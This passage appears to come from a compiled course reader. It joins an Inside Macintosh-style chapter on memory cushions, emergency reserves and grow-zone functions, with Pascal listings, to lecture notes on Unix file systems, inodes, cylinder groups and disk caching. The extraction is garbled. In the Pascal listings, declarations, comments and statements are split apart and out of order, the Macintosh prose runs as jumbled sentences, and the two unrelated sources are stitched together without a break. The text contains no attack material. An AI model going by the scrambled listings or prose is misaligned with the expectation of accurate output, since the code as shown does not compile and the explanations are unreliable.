Memory Because space in your heap is limited. expands the application heap to its new limit. and desk accessories as much as any user would. The DoSetUpHeap procedure defined there increases the size of the stack by 32 KB.

you need to ensure that the amount of memory that remains free after the allocation exceeds the size of your memory cushion. the Memory Manager does so automatically when you actually attempt to allocate the memory. The IsMemoryAvailable function calls the Memory Manager's PurgeSpace procedure to determine the size of the largest contiguous block that would be available if the application heap were purged. It is important. to implement some scheme that prevents your application from using too much of its own heap. otherwise.you probably need to allocate a new window record and other associated data structures. you risk running out of memory. the easiest way to determine how big to make your application's memory cushion is to experiment with various values. suppose your application allocates a new. LongInt. Usually. Determining whether allocating memory would deplete the memory cushion FUNCTION IsMemoryAvailable (memRequest: LongInt): Boolean. Notice that the IsMemoryAvailable function does not itself cause the heap to be purged or compacted. indicating that it is safe to allocate the specified amount of memory. but thousands of such blocks 130 . 40 KB is a reasonable size for most applications. As indicated earlier in this chapter. You can do this by calling the function IsMemoryAvailable defined in Listing 1-5. IsMemoryAvailable is set to TRUE. As an extra guarantee against your application's crashing. CONST kMemCushion = 40 * 1024. small relocatable block each time a user types a new line of text. That block might be small. VAR total: contig: BEGIN PurgeSpace(total. Before allocating memory for any nonessential task. {total free memory if heap purged} {largest contiguous block if heap purged} You should call the IsMemoryAvailable function before all nonessential memory requests. Listing 1-5. If you allow the user to open windows endlessly. You should attempt to find the lowest value that allows your application to execute successfully no matter how hard you try to allocate memory to make the application crash. no matter how small. that size is returned in the contig parameter. you might want to add some memory to this value. IsMemoryAvailable := ((memRequest + kMemCushion) < contig). {size of memory cushion} LongInt. therefore. IsMemoryAvailable returns FALSE. If the size of the potential memory request together with the size of the memory cushion is less than the value returned in contig. END. contig). One way to do this is to maintain a memory cushion that can be used only to satisfy essential memory requests. This might adversely affect your application's ability to perform important operations such as saving existing data in a window. For example.

Instead call a function such as NewHandleCushion. For example. you should check to see if there is sufficient memory available before allocating each one. however. Therefore. you must make sure that essential requests can never deplete all of the cushion. BEGIN IF NOT IsMemoryAvailable(logicalSize) THEN NewHandleCushion := NIL ELSE BEGIN SetGrowZone(NIL). and to perform typical maintenance tasks such as updating windows. {remove grow-zone function} NewHandleCushion := NewHandleClear(logicalSize). Other user actions are likely to be always rejectable. you should make the New Document and Open Document menu commands rejectable. If you consider a certain dialog box (for instance. If you want to make such dialog boxes available at all costs. Note that when you call the IsMemoryAvailable function for a nonessential request. NewPtr.could take up a considerable amount of space. In practice. For example. call the IsMemoryAvailable function before an essential memory request. you must ensure that you allocate a large enough memory cushion to handle the maximum number of these dialog boxes that the user could open at once. modal and modeless boxes present special problems. defined in Listing 1-7. before calling NewHandle. IsMemoryAvailable returns FALSE no matter how small the nonessential request is. Allocating Blocks of Memory As you have seen. or another function that allocates memory. essential requests might have already dipped into the memory cushion. In that case. or NewPtrCushion. Some actions should never be rejectable. you should guarantee that there is always enough memory free to save open documents. You should never. When deciding how big to make the memory cushion for your application. exceeds the size of the memory cushion. because you cannot allow the user to create an endless number of documents. SetGrowZone(@MyGrowZone). you should check that the amount of space remaining after the allocation. 131 {install grow-zone function} . a spelling checker) nonessential. Listing 1-6 Allocating relocatable blocks FUNCTION NewHandleCushion (logicalSize: Size): Handle. you must be prepared to inform the user that there is not enough memory to open it if memory space become low. An easy way to do this is never to allocate memory for nonessential tasks by calling NewHandle or NewPtr directly. a key element of the memory-management scheme presented in this chapter is to disallow any nonessential memory allocation requests that would deplete the memory cushion. END. Although the decisions of which actions to make rejectable are usually obvious. this means that. if successful. defined in Listing 1-6.

You can define a function NewPtrCushion to handle allocation of nonrelocatable blocks. myPtr. SetGrowZone(@MyGrowZone). END. as shown in Listing 1-7. The NewHandleCushion function first calls IsMemoryAvailable to determine whether allocating the requested number of bytes would deplete the memory cushion. {can't get memory} 132 {storage for the dialog record} {install grow-zone function} . Otherwise.END. END. IF MemError = noErr THEN GetDialog := GetNewDialog(dialogID. VAR myPtr: Ptr. however. NewHandleCushion calls NewHandleClear to allocate the relocatable block. if there is indeed sufficient space for the new block. BEGIN IF NOT IsMemoryAvailable(logicalSize) THEN NewPtrCushion := NIL ELSE BEGIN SetGrowZone(NIL). This prevents the grow-zone function from releasing any emergency memory reserve your application might be maintaining. {remove grow-zone function} NewPtrCushion := NewPtrClear(logicalSize). Listing 1-8 Allocating a dialog record FUNCTION GetDialog (dialogID: Integer): DialogPtr. Before calling NewHandleClear. If so. NewHandleCushion returns NIL to indicate that the request has failed. BEGIN myPtr := NewPtrCushion(SizeOf(DialogRecord)). NewHandleCushion disables the grow-zone function for the application heap. Listing 1-8 illustrates a typical way to call NewPtrCushion. WindowPtr(-1)) ELSE GetDialog := NIL. Listing 1-7 Allocating nonrelocatable blocks FUNCTION NewPtrCushion (logicalSize: Size): Handle.

the DisposeWindow procedure releases memory allocated with the NewWindow function. it is no longer free in the heap and does not enter into the free-space determination done by IsMemoryAvailable. When you allocate memory directly.END. you can later release it by calling the DisposeHandle and DisposePtr procedures. you should check whether the reserve has been released. Creating an emergency memory reserve PROCEDURE InitializeEmergencyMemory. you can release the reserve. you should warn the user that memory is critically short. The InitializeEmergencyMemory procedure defined in Listing 1-9 simply allocates a relocatable block of a predefined size. To create and maintain an emergency memory reserve. at least for essential operations. you need to allocate a block of reserve memory. you can declare a global variable of type Handle. VAR gEmergencyMemory: Handle. BEGIN gEmergencyMemory := NewHandle(kEmergencyMemorySize). you follow three distinct steps: • When your application starts up. SetGrowZone(@MyGrowZone). This function also installs the application-defined grow-zone procedure. If you cannot recover the reserve. Be sure to use these special Toolbox routines instead of the generic Memory Manager routines when applicable. To refer to the emergency reserve. Listing 1-9. If it has. there is always a corresponding Toolbox routine to release that memory. This memory reserve is a block of memory that your application uses only for essential operations and only when all other heap space has been allocated. This effectively ensures that you always have the memory you request. When your application needs to fulfill an essential memory request and there isn't enough space in your heap to satisfy the request. When you allocate memory indirectly by calling a Toolbox routine. Each time through your main event loop. END. A reasonable size for the 133 • • . Maintaining a Memory Reserve A simple way to help ensure that your application always has enough memory available for essential operations is to maintain an emergency memory reserve. That block is the emergency memory reserve. {handle to emergency memory reserve} Listing 1-9 defines a function that you can call early in your application's execution (before entering your main event loop) to create an emergency memory reserve. For example. This section illustrates one way to implement a memory reserve in your application. Because you allocate the block. you should attempt to recover the reserve.

END. IsMemoryAvailable:= ((memRequest + kMemCushion) < contig). Then. To check that the memory reserve is intact. END. when determining whether a nonessential memory allocation request should be honored. contig). BEGIN IsEmergencyMemory := (gEmergencyMemory <> NIL) & (gEmergencyMemory^ <> NIL). use the function IsEmergencyMemory defined in Listing 1-10.memory reserve is whatever size you use for the memory cushion. LongInt. {size of memory reserve} When using a memory reserve. you need to change the IsMemoryAvailable function defined earlier in Listing 1-5. Listing 1-11. that the memory reserve has not been released. END. CONST kEmergencyMemorySize = 40 * 1024. Listing 1-10. {total free memory if heap purged} {largest contiguous block if heap purged} . VAR total: contig: BEGIN IF NOT IsEmergencyMemory THEN {is emergency memory available?} IsMemoryAvailable := FALSE ELSE BEGIN PurgeSpace(total. this is exactly like the earlier version except that it indicates that memory is not available if the memory reserve is not intact. Checking the emergency memory reserve FUNCTION IsEmergencyMemory: Boolean. 134 LongInt. You need to make sure. you can replace the function IsMemoryAvailable defined in Listing 1-5 by the version defined in Listing 1-11. Determining whether allocating memory would deplete the memory cushion FUNCTION IsMemoryAvailable (memRequest: LongInt): Boolean. As you can see. 40 KB is a good size for many applications. Once again.

For example. the Memory Manager once again purges and compacts the heap and tries again to allocate the requested amount of memory. END. kEmergencyMemorySize). A grow-zone function should be of the following form: FUNCTION MyGrowZone (cbNeeded: Size): LongInt. because you are likely to want to reallocate the block. the Memory Manager has protected by calling the GZSaveHnd function in your grow-zone function. if the amount it releases is not enough. If there is still insufficient memory. before you make your event call: IF NOT IsEmergencyMemory THEN RecoverEmergencyMemory. it managed to free. which purges a relocatable block from the heap and sets the block's master pointer to NIL. 135 . steps should be taken to save any important data and to free some memory. The RecoverEmergencyMemory function. Typically a grow-zone function frees space by calling the EmptyHandle procedure. you might want to notify the user that because memory is in short supply. to do this. This mechanism allows your grow-zone function to release memory gradually. Each time through your main event loop. but only if the function returned a nonzero value when last called. When the function returns. if any. Your function should return the number of bytes. You can install a simple grow-zone function that takes care of releasing the reserve at the proper moment. simply attempts to reallocate the memory reserve. Your function can do whatever it likes to free that much space in the heap. This is preferable to disposing of the space (by calling the DisposeHandle procedure). defined in Listing 1-12. The Memory Manager passes to your function (in the cbNeeded parameter) the number of bytes it needs. your grow-zone function might dispose of certain blocks or make some unpurgeable blocks purgeable. Listing 1-12 Reallocating the emergency memory reserve PROCEDURE RecoverEmergencyMemory. if any. If you are unable to reallocate the memory reserve.Once you have allocated the memory reserve early in your application's execution. Defining a Grow-Zone Function The Memory Manager calls your heap's grow-zone function only after other attempts to obtain enough memory to satisfy a memory allocation request have failed. the Memory Manager calls your grow-zone function again. The Memory Manager might designate a particular relocatable block in the heap as protected. You can determine which block. BEGIN ReallocateHandle(gEmergencyMemory. you can check whether the reserve is still intact. it should be released only to honor essential memory requests when there is no other space available in your heap. the Memory Manager calls it again and gives it the opportunity to take more drastic measures. your grow-zone function should not move or purge that block. add these lines of code to your main event loop.

for example. The function MyGrowZone defined in Listing 1-13 saves the current value of the A5 register when it begins and then restores the previous value before it exits. END ELSE MyGrowZone := 0. First. {no more memory to release} {restore previous value of A5} <> NIL) & (gEmergencyMemory <> LongInt. then MyGrowZone returns 0 to indicate that no memory was released. remember current value of A5. VAR theA5: BEGIN theA5:= SetCurrentA5. MyGrowZone := kEmergencyMemorySize. Listing 1-13 A grow-zone function that releases emergency storage FUNCTION MyGrowZone (cbNeeded: Size): LongInt. {value of A5 when function is called} 136 . theA5 := SetA5(theA5). install ours} IF (gEmergencyMemory^ GZSaveHnd) THEN BEGIN EmptyHandle(gEmergencyMemory). See the chapter "Memory Management Utilities" in this book for more information about saving and restoring the A5 register. This is necessary because your grow-zone function might be called at a time when the system is attempting to allocate memory and value in the A5 register is not correct. The MyGrowZone function attempts to create space in the application heap simply by releasing the block of emergency memory. If either of these conditions isn't true. however. END. during an attempt to reallocate the emergency memory block). it checks that (1) the emergency memory hasn't already been released and (2) the emergency memory is not a protected block of memory (as it would be.Listing 1-13 defines a very basic grow-zone function.

Meaning of a Latex file is different for the Latex executable than for a standard text editor. C++ object files. Macintosh. Standard place to store files: on a hard disk or floppy disk. FrameMaker source. PostScript files. Important topic . meaning of a file is simply a sequence of bytes. and file system performance is crucial component of overall system performance. Perl scripts. etc. In general.CHAPTER 9 CACHING AND INTRO TO FILE SYSTEMS Introduction to File Systems • File systems. Also. Most systems let you organize files into a tree structure. is maybe the most important. IBM mainframes do this.start with a #!/usr/bin/perl. Object file format has meaning to linker. Nachos source. and OS handles different kinds of files differently. In practice. Unix shell interprets file using tool. data may be a network away. Executable file format has meaning to OS. Meaning of a file depends on the tools that manipulate it. how does Unix tell executables apart from shell scripts apart from Perl files when it executes it? o Perl Scripts . shell files. What are files? Data that is readily available.most crucial data stored in file systems. databases. Some systems support a lot of different file types explicitly. 137 • • • • • • . but stored on non-volatile media. o Shell Scripts . Knowledge of file types built into OS. if file starts with #!tool. In Unix. How do Unix tools tell file types apart? By looking at contents! For example. executables.start with a #. What is stored in files? Latex source. so have directories and files.

can have a disk block table telling where each disk block is. Other file extensions are recognized by other programs but not by OS. implicit. o Indexed . it automatically starts the program that created file and loads the file. So. then go to the block containing data. o What about PostScript files? Start with something like %!PS-Adobe-2. for example). What about DOS? Have an ad-hoc file typing mechanism built into file naming conventions.where file is stored on disk o Size o Protection o Time.0. Recall Nachos object file format. text) and the name of program that created the file. These are enforced by OS (because it is involved with launching executables). Single exception: directories and symbolic links are explicitly tagged in Unix. When double click on the file. Nachos executable files are accessed directly. To access indexed data.exe identify two different kinds of executables. o Location .o How about executables? Start with Unix executable magic number. 138 • • . can have file just laid out sequentially on disk.in Unix. A payroll file. Have to have utilities that twiddle the file metadata (types and program names). . for example. o For sequential access. How do programs access files? Several general ways: o Sequential . date and user identification.index file by identifier (name. which printing utilities recognize.open it. Very important for data security. first traverse disk block table to find right disk block. • File structure can be optimized for a given access mode. then retrieve record associated by name. then read or write from beginning to end.com and . What is problem? o For direct access. . o Direct . may be accessed sequentially by paycheck program and indexed by personnel office. Files may be accessed more than one way. • • All file system information is stored in nonvolatile storage in a way that it can be reconstructed on a system crash. • What about Macintosh? All files have a type (pict.specify the starting address of the data. File attributes: o Name o Type .bat identifies a text batch file.

or both. Unix prevents users from making hard links create cycles by only allowing hard links to point to files. System becomes harder to use (must choose file format. Can also set up source directories. but data goes away when process dies. Memory-mapped files. Common arrangement: tree of files. To organize files. If file is moved. Standard solution: reference counts. tar handles it well. if get it wrong it is a big problem). and system builds a two-level index for the key. o Hard Links: sticks with the file. If another file is copied into that spot. and then directories of files. must be sure not to delete hard linked files until all pointers to them are gone.just keep track of current file position. Second. Example: IBM ISAM (Indexed Sequential Access Mode). Typically useful file system structuring tool. • • • • • Easy to simulate a sequential access file given a direct access file . What about cyclic graph structures? Problem is that cycles may make reference counts not work . Advantage of lots of file formats: user probably has one that fits the bill. To get rid of file. then link compilation directories to source directories. then read it back in again when need it. Unix supports two kinds of links: o Symbolic Links: directory entry is name of another file. structure becomes a graph. many systems provide a hierarchical file system arrangement. But simulating direct access file with a sequential access file is a lot harder.can have a section of graph that is disconnected from rest. Uses binary search at each level of index. Naming can be absolute. If want to preserve data.o For more sophisticated indexed access. Not done very often because it takes so long. Only solution: garbage collect. hard link still points to file. cp does not handle this well for soft links. symbolic link all of a sudden points to it. If that file is moved. Can have files. IBM lots (I don't know just how many). with still have some cycles in structure. must delete it from all places that have hard links to it. Notice how memory hierarchy considerations drive file implementation. User selects a key. symbolic link still points to (non-existent) file. not directories. Directory structure. Can get to same file in multiple ways. So. Standard solution: marking. Fundamental design choice: lots of file formats or few file formats? Unix: few (one) file format. First. must write it to disk. Link command (ln) sets these links up. Graph structure introduces complications. then linear search within final block. VMS: few (three). But. relative. Disadvantage: OS becomes larger. • • • • 139 . but all entries have positive reference counts. only want to traverse files once even if have multiple references to same file. There is sometimes a need to share files between different parts of the tree. may build an index file. Standard view of system: have data stored in address space of a process. • • Uses for soft links? Can have two people share files.

In Unix. each row of access matrix is an access list. Can map part of file into process's address space and read and write the file like a normal piece of memory. How is sharing set up for processes on the same machine? What about processes on different machines? Next issue: protection. read. want to create coarser grain concepts. Want protection on individual file and operation basis. What is worse. Each entry of matrix lists operations that the principal can perform on the resource. Why is protection necessary? Because people want to share files. have operations (open. Solution: memory-mapped files. processes can share persistent data directly with no hassles. • • • • • Conceptually. o Access lists: for each resource (like a file). but not share all aspects of all files. generalized to user level. the system call that sets this up is the map system call. o Professor wants to keep exam in same directory as assignments. For convenience. but students should not be able to read exam. Have list of principals across top and resources on the side. etc. execute). o Can execute but not write commands like cp. 140 . must maintain consistency between file and data read in via some other mechanism. Two standard mechanisms for access control: access lists and capabilities. Can describe desired protection using access matrix. So. Used for stuff like snapshot files in interactive systems. give a list of principals allowed to access that resource and the access they are allowed to perform. resources (files) and principals (users or processes). Capabilities must be unforgeable. Everybody should be able to read files in a given directory. Programs can dump data structures to disk without having to write routines to linearize. So. o Capabilities: for each resource and access operation. give out capabilities that give the holder the right to perform the operation on that resource. can organize on a group • basis. if programs share data using files. Instead of organizing access lists on a principal by principal basis. cat. write. Will talk more about security later. Others should not be able to access them. Sort of like memory-mapped IO. o Professor wants students to read but not write assignments. • Who controls access lists and capabilities? Done under OS control. Each column of access matrix is a capability list.• Writing IO routines to dump data to disk and back again is a real hassle. output and read in data structures. • • All people in research group should be able to read and write source files.

5.dvi 1218 Apr 19 22:27 a0. What does a disk look like? It is a stack of platters. with the heads riding on a cushion of air.928 o Bytes/Sector: 512 .60. then copy data off of disk into memory (transfer time). is a fairly simple and primitive protection strategy./ 512 May 3 17:46 . The heads move back and forth between the platters as a unit. To read a given sector we first move the heads to that sector's cylinder (seek time).058 o Track Capacity (bytes): 40.25 inch 4.6-5.5 o Track-to-track Seek: 1.448 .. Like everything else in Unix. write and execute.3 ms o Max Seek: 25 ms 141 • • .tex* • 2 drwxr-xr-x 7 martin faculty 2 -rw-r----8 -rw-r----4 -rw-r----72 -rw-r--r-6 -rwxr-xr-x • • 1 martin faculty 1 martin faculty 1 martin faculty 1 martin faculty 1 martin faculty How are files implemented on a standard hard-disk based system? It is up to OS to implement it.520 o Sectors/Track: 79-119 o Media Transfer Rate (MB/s): 3. then wait for the sector to rotate under the head (latency time). A sector is the unit of disk transfer./ 213 Apr 19 22:27 a0. Unix file listing: 4 drwxr-xr-2 martin faculty 2048 May 15 21:03 . The set of tracks that can be accessed without moving the heads is a cylinder. Each platter may have two surfaces (one per side). Typical hard disk statistics: (Sequel 5400 from August 1993. o Platters: 13 o Read/Write heads: 26 o Tracks/Surface: 3.ps 2599 Apr 5 18:07 a0. Protections are given for each operation on basis of everybody. Why must OS do this? Protection. There is one disk head per surface.read. Each track is broken up into sectors.aux 3488 Apr 19 22:27 a0.• What is the Unix security model? Have three operations .log 36617 Apr 19 22:27 a0. The surfaces revolve beneath the heads. The area beneath a stationary head is a track.0Gbyte). group and owner. Each file has an owner and a group.

almost no seeks required. 60 ns memory. What does disk look like to OS? Is just a sequence of sectors. Even direct access is fast . How many instructions can execute in 30 ms (about time for average seek plus average latency)? 33 * 30 * 1000 = 990. which makes memory allocation a lot easier. OS may logically link several disk sectors together to increase effective disk block size. First implementation strategy: contiguous allocation. All sectors in a track are in sequence.000. many operations require multiple disk accesses. Link together adjacent blocks like a linked list.400 rpm o Average Latency: 5. Can either use IO instructions or memory-mapped IO operations. Had a 33 MHz MIPS R3000. Job of the OS is to implement file system abstractions on top of these chunks. Advantages: • • • Quick and easy calculation of block holding data . and it can be very expensive. Adjacent cylinders are in sequence.o Average Seek: 12 ms o Rotational Speed: 5. In effect. Plus.an old IBM interactive system.just offset from start of file! For sequential access.6 ms • How does this compare to timings for a standard workstation? DECStation 5000 is a standard workstation available in 1993. 142 . OS issues instructions to disk controller. Just lay out the file in contiguous disk blocks. How does OS access disk? There is a piece of hardware on the disk called a disk controller.may have to move whole file!! External Fragmentation. Used in VM/CMS . Advantages: o No more variable-sized file allocation problems. • • • File System Implementation • • Discuss several file system implementation strategies. disk is just a big array of fixed-size chunks. All files stored in fixed size blocks. Next strategy: linked allocation. Disadvantages: • • • • • Where is best place to put a new file? Problems when file gets bigger . Only one disk access.just seek and read. Everything takes place in fixed-size chunks. all tracks in a cylinder are in sequence. Compaction may be required.

Until end of file system . Question: how to allocate index table? Must be stored on disk like everything else in the file system. • FAT allocation.number of directory entries that point to this inode. What is in an inode . Supports fast direct file access. Each disk block consists of a number of consecutive sectors.number of disk blocks the file occupies. Disadvantages: o Potentially terrible performance for direct access files . Next 64KB . but at least don't have to go to disk for each of them. Instead of storing next file pointer in each block. Table pointer of last block in file has EOF pointer value. o Nblocks . Free blocks have table pointer of 0.disk blocks. This whole discussion is reminiscent of paging discussions. 143 • • • • • • • • . Still have to linearly traverse next pointers. o Reliability -if lose one pointer. In practice some combination scheme is usually used.Superblock plus free inode and disk block cache. Will now discuss how traditional Unix lays out file system. Each inode corresponds to one file. o Length . Have basically same alternatives as for file itself! Contiguous. and multilevel index.label + boot block. Just search for first block with 0 table pointer. Each entry of the index points to the disk blocks containing the actual file data. o Owner o Number of links . Next 8KB . directory (d). linked. Important fields: o Mode. have a table of next pointers indexed by disk block. o No need to compact or relocate files. Can just cache the FAT table and do traverse all in memory. This includes protection information and the file type. Allocation of free blocks with FAT scheme is straightforward.have to follow pointers from one disk block to the next! o Even sequential access is less efficient than for contiguous files because may generate long seeks between blocks.o No more external fragmentation. have big problems. Each inode corresponds to one file. Indexed Schemes. Give each file an index table. symbolic link (l). and not bad for sequential access.information about a file.inodes. File type can be normal file (-).how many bytes long the file is. MS/DOS and OS/2 use this scheme. First 8KB .

one sector). and each directory entry was variable length and also included the length of the file name. If a name starts with /. etc. there are some circularities in the file system structure. etc. What about symbolic links? A symbolic link is a file containing a file name. a file consists of an inode and the disk blocks that it points to.inode number) pairs. These are first 10 blocks of file. Do a simple file system example. What does a directory look like? It is a file consisting of a list of (name. and . Assume block size is 512 bytes (i. cd to a directory. Include counts. So. To access data farther in. o One triply indirect block pointer. When write a file. To access any of first 512*10 bytes of file. lookup starts at the file for inode number 2. or relative to the root directory. Points to a block full of pointers to blocks full of pointers to disk blocks. cat a file? Is there any difference between ls and ls -F? What about when use the Unix rm command? Does it always delete the file? NO . Use a different command. (Not currently used).can have holes in files. A hole shows up as block pointers that point to block 0 .? They are just names in the directory. • • Nblocks and Length do not contain redundant information . What disk accesses take place when list a directory.directory has a reference to itself (. Points to a block full of pointers to disk blocks.. If the count is 0. How does system convert a name to an inode? There is a routine called name that does it. The superblock keeps track of data that help this process along. must go indirect through at least one level of indirection. while . A superblock contains: 144 • • • • • • • • • • .. . Whenever a Unix operation has the name of the symbolic link as a component of a file name. Does this algorithm work for directories? NO .it decrements the reference count. So. inode number 2 is the inode for the top directory. Later versions of Unix removed this restriction.e. it macro substitutes the name in the file in for the component.o Array of 10 direct block pointers. length.e. o One doubly indirect block pointer.i. Where does lookup for root start? By convention. points to the inode of the directory. nothing in that block.). o One indirect block pointer. points to the inode of the directory's parent directory. and the inode number was 2 bytes.. How does Unix implement the directories . then it frees up the space. Why don't inodes contain names? Because would like a file to be able to have multiple names. User can refer to files in one of two ways: relative to current directory. may need to allocate more inodes and disk blocks. can just go straight from inode. In early Unix Systems the name was a maximum of 14 characters long. draw out inodes and disk blocks.

145 • • • • • . Note that OS maintains a list of free disk blocks. Each disk block in this sequence stores a sequence of free disk block numbers. If not. put it in superblock's inode cache if there is room. so it is replicated on disk in case part of disk fails. So. keep looking until wrap or fill inode cache in superblock. But.will start looking there next time.any bit pattern is OK for disk blocks. but only a cache of free inodes. and use it as the free disk block. The inode cache is a stack of free inodes. then put index of newly free disk block in as first number in superblock's disk block. If the inode cache is empty. it linearly searches inode list on disk to find free inodes. To free an inode. Only check against the number where OS stopped looking for inodes the last time it filled the cache. The superblock has the first disk block in this sequence. The rest of the numbers are the numbers of free disk blocks. write superblock's disk block into free block. OS stores list of free disk blocks as follows. If not. it contains the index of the next block in the disk block sequence. check the superblock's block of free disk blocks. To free a disk block do the reverse. Make this number the minimum of the freed inode number and the number already there. the index points to the top of the stack. when go to search inode list for free inodes. The first number in each disk block is the number of the next disk block in this sequence. The superblock also contains crucial information. But. grab the one at the top and decrement the index of next free block. If there are at least two numbers. Copy this disk block into the superblock's free disk block list. When OS wants to allocate an inode. it first looks in the inode cache.o the size of the file system o number of free blocks in the file system o list of free blocks available in the file system o index of next free block in free block list o the size of the inode list o the number of free inodes in the file system o a cache of free inodes o the index of the next free inode in inode cache • • The kernel maintains the superblock in memory. Keep track of where stopped looking . If there is room in the superblock's disk block. An inode is free if its type field is 0. don't do anything much. To allocate a disk block. push it on there. cannot with disk block . The list consists of a sequence of disk blocks. inodes aren't large enough to store lots of inode numbers. If there is only one number left. o Easy to store lots of free disk block numbers in one disk block. it just decrements index. and periodically writes it back to disk. Why is this? o Kernel can determine whether inode is free or not just by looking at it. When the OS allocates an inode.

Close and Delete calls? If multiple processes have file open. a count of number of processes that have file open and a bit that says whether or not to delete the file when last process that has file open closes it.o Users consume disk blocks faster than inodes. the inode index would work. Has a pointer to the current position in the open file to start reading from or writing to for Write and Read operations. Yet another form of synchronization is required. How to organize synchronization? Have a global file table in addition to local file tables. On a Read system call. obtain read lock. • • For your nachos assignments. What are sources of inefficiency in this file system? Are two kinds . • How to implement these atomicity constraints? Implement reader-writer locks for each open file.can just use a simple mutual exclusion lock. Each entry has a reader/writer lock.for example. then sets the write lock flag and returns. What does each file table do? o Global File Table: Indexed by some global file id . then release read lock and return. o Inodes are small enough to read in lots in a single disk operation.wasted time and wasted space. do not have to implement reader/writer locks . So. o Release read lock: decrements read lock count. Open. What about Create. read should either observe the entire write or none of the write. all processes must close the file before it is actually deleted. o Local File Table: Indexed by open file id for that process. 146 • • . o Reads can execute concurrently with no atomicity constraints. do something similar except get write locks. • Synchronizing multiple file accesses. perform all file operations required to read in the appropriate part of file. What should correct semantics be for concurrent reads and writes to the same file? Reads and writes should be atomic: o If a read execute concurrently. So. pauses to search for inodes aren't as bad as searching for disk blocks would be. o Acquire write lock: blocks until no other process has a write or read lock. May have other data depending on what other functionality file system supports. • Obtain read or write locks inside the kernel's system call handler. then increments read lock count and returns. Here are some operations: o Acquire read lock: blocks until no other process has a write lock. scanning lists of inodes is not so bad. On Write system call. o Release write lock: clears write lock flag. and a process calls Delete on that file.

512 byte block Data + inodes.0BSD they doubled the disk block size. But. • The initial layout attempts to minimize these phenonmena by setting up free lists so that they allocate consecutive disk blocks for new files. as use file system. o Inodes separated from files. After a few weeks.5 948. o The file blocks were bigger. o Disk blocks that store one file are scattered around the disk. Just how bad is it? Well. • Wasted space comes from internal fragmentation. still pretty bad.5 0..0 6.4 Data only. Basic problem with system described above: it scatters related items all around the disk. this is only about 4 percent (!!!!) of maxmimum disk throughput.).8 22. When they went from 3BSD to 4. (so. files tend to be consecutive on disk. maybe making block size bigger to get more of the disk transfer rate isn't such a good idea. if file size is not an even multiple of disk block size. Did some measurements on a file system at Berkeley. the disk block size equaled the sector size. there will be wasted space off the end of the last disk block in the file. Just how bad is it? It gets worse for larger block sizes. since most files are small. What is worse. So. This more than doubled the disk performance. got transfer rates of up to 175 KByte per second. so more files fit into the direct section of the inode index.2 828. and the disk blocks for files get spread all over the disk.9 11. in traditional Unix. o Inodes in same directory may be scattered around in inode space. layout gets scrambled.• Wasted time comes from waiting to access the disk. no separation between files Data + inodes. Each file with anything in it (even small ones) takes up at least one disk block. So. So. When file system first created. to calculate size and percentage of waste based on disk block size. So.. so amortized the disk seek overhead over more data. the obvious fix is to make the block size even bigger. system may spend all of its time moving the disk heads and waiting for the disk to revolve. Here are some numbers: Space Used (Mbytes) Percent Waste Organization 775. 1024 byte block Data + inodes. So. And. deteriorated down to 30 KByte per second. which was 512 bytes. there may not be lots of full disk blocks in the middle of files. 2048 byte block 147 • . Two factors: o Each block access fetched twice as much data. • But. the free list order becomes increasingly randomized.7 866.

space for inodes and a bit map describing available blocks in the cylinder group. Also try to put blocks for one file adjacent in the cylinder group. But. A cylinder group is a set of adjacent cylinders. The Unix utilities try to avoid this problem by growing files a disk block at a time. may copy a file multiple times as it grows. Each cylinder group has a redundant copy of the super block. If disk is almost completely full. 4. Basic idea behind cylinder groups: will put related information together in the same cylinder group and unrelated information apart in different cylinder groups. But. may need to copy out the last fragment if the size gets too big. Once above this reserve. Each file contains at most one fragment which holds the last part of data in the file. The minimum block size is now 4096 bytes.1128. A file system consists of a set of cylinder groups.keep a free space reserve (5 to 10 percent). Helps read bandwidth and write bandwidth for big files. would make the block size large and amortize the seek overhead down to some very small number. allocation scheme cannot keep related data together and allocation scheme degenerates to random. if have 8 small files they together only occupy one disk block. Can also allocate larger fragments if the end of the file is larger than one eighth of the disk block. So. only supervisor can allocate disk blocks. 148 • • • • • • • • • • • . For long files redirect blocks to a new cylinder group every megabyte.read bandwidth up to 43 percent of peak disk transfer rate for large files. The bitmap as a storage device makes it easier to find adjacent groups of blocks.2BSD they attempted to fix some of these problems. So. Introduced concept of a cylinder group. The bit map is laid out at the granularity of fragments. Try to put all inodes for a given directory in the same cylinder group. Each disk block can be chopped up into 2. Important point to making this scheme work well .3 45. Bottom line: this helped a lot .6 Data + inodes. don't waste a lot of space for small files? Solution: introduce concept of a disk block fragment. Use a bunch of heuristics. Default policy: allocate 1 inode per 2048 bytes of space in cylinder group. If only had large files. Increased block size. small files take up a full disk block and large disk blocks waste space. In 4. When increase the size of the file. or 8 fragments. 4096 byte block • Notice that a problem is that the presence of small files kills large file performance. This spreads stuff out over the disk at a large enough granularity to amortize the seek time.

• • • Another standard mechanism that can really help disk performance . So. give more space to file cache. What about replacement policy? Have many of same options as for paging algorithms.as soon as finish reading one disk block and move to the next. Perfecting is a general technique used to increase the performance of fetching data from longlatency devices. Sun OS does this. OS maintains a cache of disk blocks in main memory.if run an application that uses lots of files. Before reading a file. With disk block caching. Can try to hide latency by running something else concurrently with fetch. FIFO with second chance. put into disk block cache. give more to virtual memory subsystem. How easy was it to implement an exact LRU algorithm for virtual memory pages? How easy was it to implement an approximate LRU algorithm for virtual memory pages? Bottom line: different context makes different cache replacement policies appropriate for disk block caches. Most files accessed sequentially.user wants data on stable storage. How to fix this? Use free-behind for large sequentially accessed files . Can you avoid going to disk on writes? Possible answers: o No . What is bad case for all LRU algorithms? Sequential accesses. and can really help performance. check to see if appropriate disk blocks are in the cache. If run applications that need more memory. o Adaptive . When a request comes. With virtual memory. How does caching algorithm work? Devote part of main memory to cached data. eject first disk block from the cache. Can use LRU. so can optimistically prefect disk blocks ahead of the one that is being read. How easy is it to implement LRU for disk blocks? Pretty easy . • • • • • • • • • • • How to handle writes. Each gets a fixed amount.OS gets control every time disk block is accessed.a disk block cache. Can use read-ahead to improve file system performance. So what cache replacement policy do you use? Best choice depends on how file is accessed.not flexible enough for all situations. it can satisfy Request locally if data is in cache. When read a file. So can implement an exact LRU algorithm easily. physical memory serves as a cache for processes stored on disk. This is part of almost any IO system in a modern machine. that's why he wrote it to a file. have one physical resource shared by two parts of system. So. policy choice is difficult because may not know. How much of each resource should file cache and virtual memory get? o Fixed allocation. Problem . etc. physical memory serves as a cache for the files stored on disk. What is common case for file access? Sequential accesses. 149 .

